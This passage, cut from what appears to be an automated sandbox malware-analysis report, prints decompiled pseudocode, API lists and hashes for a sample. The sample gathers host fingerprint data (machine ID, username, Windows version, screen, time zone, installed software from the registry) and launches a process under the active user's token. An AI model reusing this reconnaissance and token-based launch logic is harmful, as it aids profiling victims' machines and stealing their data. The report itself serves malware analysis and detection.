				_t142 = 0xc;
				do {
					_push(0);
					_push(0);
					_t142 = _t142 - 1;
					_t189 = _t142;
				} while (_t142 != 0);
				_t141 = _t59;
				_push(_t183);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t184;
				_push("MachineID :   ");
				E00406C4C( &_v8, _t141, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t141);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t141, _t180, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t189);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t141);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v40);
				E004037DC( &_v68, "Screen: ",  *_t141);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t141,  &_v72, __esi, _t189);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t141,  &_v76, _t181, _t189);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v60);
				_push( *_t141);
				_push("Layouts: ");
				E00416FB8( &_v80, _t141, _t180, _t181);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("LocalTime: ");
				E00417198( &_v84, _t141, _t181);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("Zone: ");
				E00417098( &_v88, _t141, _t180, _t181, _t189);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t141);
				E00416748( &_v92, _t141, _t180, _t181);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t141);
				E00416B94( &_v96, _t141, _t180, _t181, _t189);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t141);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t141, _t180, _t181);
				E00403798(_t141, _v100);
				_t172 = 0x4175a8;
				 *[fs:eax] = _t172;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}


































                                                                      0x0041727c
                                                                      0x0041727c
                                                                      0x0041727d
                                                                      0x0041727f
                                                                      0x00417281
                                                                      0x00417283
                                                                      0x00417284
                                                                      0x00417286
                                                                      0x00417288
                                                                      0x0041728a
                                                                      0x0041728e
                                                                      0x00417291
                                                                      0x00417293
                                                                      0x00417298
                                                                      0x00417298
                                                                      0x0041729a
                                                                      0x0041729c
                                                                      0x0041729c
                                                                      0x0041729c
                                                                      0x004172a0
                                                                      0x004172a4
                                                                      0x004172a5
                                                                      0x004172aa
                                                                      0x004172ad
                                                                      0x004172b0
                                                                      0x004172b8
                                                                      0x004172bd
                                                                      0x004172c0
                                                                      0x004172cc
                                                                      0x004172d1
                                                                      0x004172d3
                                                                      0x004172dd
                                                                      0x004172e2
                                                                      0x004172e5
                                                                      0x004172f1
                                                                      0x004172f6
                                                                      0x004172f8
                                                                      0x00417300
                                                                      0x00417305
                                                                      0x00417308
                                                                      0x00417315
                                                                      0x00417320
                                                                      0x00417325
                                                                      0x0041732b
                                                                      0x00417330
                                                                      0x00417333
                                                                      0x0041733b
                                                                      0x00417340
                                                                      0x00417343
                                                                      0x00417350
                                                                      0x0041735a
                                                                      0x00417369
                                                                      0x00417374
                                                                      0x00417379
                                                                      0x0041737f
                                                                      0x00417384
                                                                      0x00417387
                                                                      0x0041738f
                                                                      0x00417394
                                                                      0x00417397
                                                                      0x0041739c
                                                                      0x004173a9
                                                                      0x004173b3
                                                                      0x004173c2
                                                                      0x004173cd
                                                                      0x004173d2
                                                                      0x004173df
                                                                      0x004173e4
                                                                      0x004173e7
                                                                      0x004173f6
                                                                      0x004173fb
                                                                      0x004173fe
                                                                      0x0041740b
                                                                      0x00417415
                                                                      0x0041741a
                                                                      0x0041741c
                                                                      0x00417424
                                                                      0x00417429
                                                                      0x0041742c
                                                                      0x00417438
                                                                      0x0041743d
                                                                      0x0041743f
                                                                      0x00417447
                                                                      0x0041744c
                                                                      0x0041744f
                                                                      0x0041745b
                                                                      0x00417460
                                                                      0x00417462
                                                                      0x0041746a
                                                                      0x0041746f
                                                                      0x00417472
                                                                      0x0041747e
                                                                      0x00417483
                                                                      0x00417488
                                                                      0x0041748d
                                                                      0x00417490
                                                                      0x0041749c
                                                                      0x004174a3
                                                                      0x004174a8
                                                                      0x004174ad
                                                                      0x004174b2
                                                                      0x004174b5
                                                                      0x004174ba
                                                                      0x004174c6
                                                                      0x004174cd
                                                                      0x004174d2
                                                                      0x004174d4
                                                                      0x004174e5
                                                                      0x004174ec
                                                                      0x004174f4
                                                                      0x004174fe
                                                                      0x00417505
                                                                      0x00417508
                                                                      0x0041750b
                                                                      0x00417518
                                                                      0x00417525
                                                                      0x0041752d
                                                                      0x0041753a
                                                                      0x00417542
                                                                      0x0041754f
                                                                      0x0041755c
                                                                      0x00417569
                                                                      0x0041757b

                                                                      APIs
                                                                      • GetSystemMetrics.USER32 ref: 004173D7
                                                                      • GetSystemMetrics.USER32 ref: 004173EE
                                                                        • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                      • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                        • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                        • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                        • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                        • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                        • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                        • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                      • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                      • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                        • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                        • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                        • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                        • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                      • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                      • API String ID: 75899496-943277980
                                                                      • Opcode ID: 17725f65cc4c1735e4182602efd43c1d89c2794d0dcd42a19e9bfb2a36610cac
                                                                      • Instruction ID: 915cc31ebaf767ee9912e0c916b5d60c1651ad94c460c6a34579714c0f7d2b16
                                                                      • Opcode Fuzzy Hash: 17725f65cc4c1735e4182602efd43c1d89c2794d0dcd42a19e9bfb2a36610cac
                                                                      • Instruction Fuzzy Hash: 9A814E70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A468B19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00417290 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 201sleepCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 40%
                                                                      			E00417290(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t140;
				void* _t141;
				intOrPtr _t171;
				intOrPtr _t182;
				intOrPtr _t183;

				_t180 = __esi;
				_t179 = __edi;
				_t182 = _t183;
				_t141 = 0xc;
				do {
					_push(0);
					_push(0);
					_t141 = _t141 - 1;
					_t184 = _t141;
				} while (_t141 != 0);
				_t140 = __eax;
				_push(_t182);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t183;
				_push("MachineID :   ");
				E00406C4C( &_v8, __eax, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t140);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t140, __edi, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t184);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t140);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v40);
				E004037DC( &_v68, "Screen: ",  *_t140);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t140,  &_v72, _t180, _t184);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t140,  &_v76, _t180, _t184);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v60);
				_push( *_t140);
				_push("Layouts: ");
				E00416FB8( &_v80, _t140, __edi, _t180);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("LocalTime: ");
				E00417198( &_v84, _t140, _t180);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("Zone: ");
				E00417098( &_v88, _t140, _t179, _t180, _t184);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t140);
				E00416748( &_v92, _t140, _t179, _t180);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t140);
				E00416B94( &_v96, _t140, _t179, _t180, _t184);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t140);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t140, _t179, _t180);
				E00403798(_t140, _v100);
				_t171 = 0x4175a8;
				 *[fs:eax] = _t171;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}
































                                                                      0x00417290
                                                                      0x00417290
                                                                      0x00417291
                                                                      0x00417293
                                                                      0x00417298
                                                                      0x00417298
                                                                      0x0041729a
                                                                      0x0041729c
                                                                      0x0041729c
                                                                      0x0041729c
                                                                      0x004172a0
                                                                      0x004172a4
                                                                      0x004172a5
                                                                      0x004172aa
                                                                      0x004172ad
                                                                      0x004172b0
                                                                      0x004172b8
                                                                      0x004172bd
                                                                      0x004172c0
                                                                      0x004172cc
                                                                      0x004172d1
                                                                      0x004172d3
                                                                      0x004172dd
                                                                      0x004172e2
                                                                      0x004172e5
                                                                      0x004172f1
                                                                      0x004172f6
                                                                      0x004172f8
                                                                      0x00417300
                                                                      0x00417305
                                                                      0x00417308
                                                                      0x00417315
                                                                      0x00417320
                                                                      0x00417325
                                                                      0x0041732b
                                                                      0x00417330
                                                                      0x00417333
                                                                      0x0041733b
                                                                      0x00417340
                                                                      0x00417343
                                                                      0x00417350
                                                                      0x0041735a
                                                                      0x00417369
                                                                      0x00417374
                                                                      0x00417379
                                                                      0x0041737f
                                                                      0x00417384
                                                                      0x00417387
                                                                      0x0041738f
                                                                      0x00417394
                                                                      0x00417397
                                                                      0x0041739c
                                                                      0x004173a9
                                                                      0x004173b3
                                                                      0x004173c2
                                                                      0x004173cd
                                                                      0x004173d2
                                                                      0x004173df
                                                                      0x004173e4
                                                                      0x004173e7
                                                                      0x004173f6
                                                                      0x004173fb
                                                                      0x004173fe
                                                                      0x0041740b
                                                                      0x00417415
                                                                      0x0041741a
                                                                      0x0041741c
                                                                      0x00417424
                                                                      0x00417429
                                                                      0x0041742c
                                                                      0x00417438
                                                                      0x0041743d
                                                                      0x0041743f
                                                                      0x00417447
                                                                      0x0041744c
                                                                      0x0041744f
                                                                      0x0041745b
                                                                      0x00417460
                                                                      0x00417462
                                                                      0x0041746a
                                                                      0x0041746f
                                                                      0x00417472
                                                                      0x0041747e
                                                                      0x00417483
                                                                      0x00417488
                                                                      0x0041748d
                                                                      0x00417490
                                                                      0x0041749c
                                                                      0x004174a3
                                                                      0x004174a8
                                                                      0x004174ad
                                                                      0x004174b2
                                                                      0x004174b5
                                                                      0x004174ba
                                                                      0x004174c6
                                                                      0x004174cd
                                                                      0x004174d2
                                                                      0x004174d4
                                                                      0x004174e5
                                                                      0x004174ec
                                                                      0x004174f4
                                                                      0x004174fe
                                                                      0x00417505
                                                                      0x00417508
                                                                      0x0041750b
                                                                      0x00417518
                                                                      0x00417525
                                                                      0x0041752d
                                                                      0x0041753a
                                                                      0x00417542
                                                                      0x0041754f
                                                                      0x0041755c
                                                                      0x00417569
                                                                      0x0041757b

                                                                      APIs
                                                                      • GetSystemMetrics.USER32 ref: 004173D7
                                                                      • GetSystemMetrics.USER32 ref: 004173EE
                                                                        • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                      • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                        • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                        • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                        • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                        • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                        • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                        • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                      • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                      • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                        • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                        • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                        • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                        • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                      • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                      • API String ID: 75899496-943277980
                                                                      • Opcode ID: f4a320fc65cbdb4cb838666442c70b6f53f3e824657c5935ffb89e30a1f9f270
                                                                      • Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
                                                                      • Opcode Fuzzy Hash: f4a320fc65cbdb4cb838666442c70b6f53f3e824657c5935ffb89e30a1f9f270
                                                                      • Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407DD0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 100libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 49%
                                                                      			E00407DD0(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v36;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				intOrPtr* _t61;
				intOrPtr _t74;
				intOrPtr* _t76;
				void* _t79;
				void* _t81;

				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_v112 = 0;
				_v12 = 0;
				_v20 = 0;
				 *[fs:eax] = _t81 + 0xffffff98;
				_t28 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
				_t30 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
				_t76 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
				E00402754(0,  &_v112);
				E00403D2C( &_v20, _v112);
				E00404F00();
				_v108 = 0x44;
				_v100 = 0;
				 *_t28( *[fs:eax], 0x407eea, _t81, __edi, __esi, __ebx, _t79, __ebx);
				_push( &_v16);
				_push(0);
				if( *_t30() != 0) {
					 *_t76( &_v20, _v12, 0xffffffff);
					_t61 =  *0x41b5e8; // 0x41c728
					 *((intOrPtr*)( *_t61))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
					asm("sbb eax, eax");
				}
				_pop(_t74);
				 *[fs:eax] = _t74;
				_push(E00407EF1);
				E004034E4( &_v108);
				E00403B80( &_v16);
				return E00403B80( &_v8);
			}




















                                                                      0x00407dd1
                                                                      0x00407dd3
                                                                      0x00407ddf
                                                                      0x00407de2
                                                                      0x00407de5
                                                                      0x00407df3
                                                                      0x00407e06
                                                                      0x00407e1d
                                                                      0x00407e39
                                                                      0x00407e40
                                                                      0x00407e4b
                                                                      0x00407e58
                                                                      0x00407e5d
                                                                      0x00407e66
                                                                      0x00407e69
                                                                      0x00407e70
                                                                      0x00407e71
                                                                      0x00407e76
                                                                      0x00407e82
                                                                      0x00407eb3
                                                                      0x00407eba
                                                                      0x00407ebf
                                                                      0x00407ec2
                                                                      0x00407ec6
                                                                      0x00407ec9
                                                                      0x00407ecc
                                                                      0x00407ed4
                                                                      0x00407edc
                                                                      0x00407ee9

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                                                                      • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                                                                      • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                                                                      • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                                                                      • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                                                                        • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc$FileModuleName
                                                                      • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                      • API String ID: 2206896924-1825016774
                                                                      • Opcode ID: 3541d8832b36f0892a1d27c611b6b39943f35115fd077f71142f5b0334879507
                                                                      • Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
                                                                      • Opcode Fuzzy Hash: 3541d8832b36f0892a1d27c611b6b39943f35115fd077f71142f5b0334879507
                                                                      • Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407DD4 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 48%
                                                                      			E00407DD4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v36;
				intOrPtr _v96;
				char _v104;
				char _v108;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t27;
				intOrPtr* _t58;
				intOrPtr _t71;
				intOrPtr* _t73;
				void* _t76;
				void* _t78;

				_v108 = 0;
				_v8 = 0;
				_v16 = 0;
				 *[fs:eax] = _t78 + 0xffffff98;
				_t25 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
				_t27 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
				_t73 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
				E00402754(0,  &_v108);
				E00403D2C( &_v16, _v108);
				E00404F00();
				_v104 = 0x44;
				_v96 = 0;
				 *_t25( *[fs:eax], 0x407eea, _t78, __edi, __esi, __ebx, _t76);
				_push( &_v12);
				_push(0);
				if( *_t27() != 0) {
					 *_t73( &_v20, _v12, 0xffffffff);
					_t58 =  *0x41b5e8; // 0x41c728
					 *((intOrPtr*)( *_t58))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
					asm("sbb eax, eax");
				}
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(E00407EF1);
				E004034E4( &_v108);
				E00403B80( &_v16);
				return E00403B80( &_v8);
			}


















                                                                      0x00407ddf
                                                                      0x00407de2
                                                                      0x00407de5
                                                                      0x00407df3
                                                                      0x00407e06
                                                                      0x00407e1d
                                                                      0x00407e39
                                                                      0x00407e40
                                                                      0x00407e4b
                                                                      0x00407e58
                                                                      0x00407e5d
                                                                      0x00407e66
                                                                      0x00407e69
                                                                      0x00407e70
                                                                      0x00407e71
                                                                      0x00407e76
                                                                      0x00407e82
                                                                      0x00407eb3
                                                                      0x00407eba
                                                                      0x00407ebf
                                                                      0x00407ec2
                                                                      0x00407ec6
                                                                      0x00407ec9
                                                                      0x00407ecc
                                                                      0x00407ed4
                                                                      0x00407edc
                                                                      0x00407ee9

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                                                                      • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                                                                      • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                                                                      • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                                                                      • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                                                                        • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc$FileModuleName
                                                                      • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                      • API String ID: 2206896924-1825016774
                                                                      • Opcode ID: 86478b50a7e8737c81cdd02ec66c25257b217c2bcec2324e0f8070e42a551c88
                                                                      • Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
                                                                      • Opcode Fuzzy Hash: 86478b50a7e8737c81cdd02ec66c25257b217c2bcec2324e0f8070e42a551c88
                                                                      • Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00416B94 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 225libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 71%
                                                                      			E00416B94(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				long _v12;
				intOrPtr _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				CHAR* _t113;
				CHAR* _t119;
				CHAR* _t125;
				void* _t137;
				void* _t141;
				void* _t169;
				signed int _t170;
				void* _t171;
				intOrPtr* _t174;
				signed int _t183;
				intOrPtr* _t192;
				void* _t193;
				signed int _t194;
				signed int _t195;
				intOrPtr _t214;
				intOrPtr _t216;
				signed int _t229;
				intOrPtr* _t239;
				signed int _t240;
				signed int _t242;
				void* _t243;
				void* _t244;
				void* _t246;
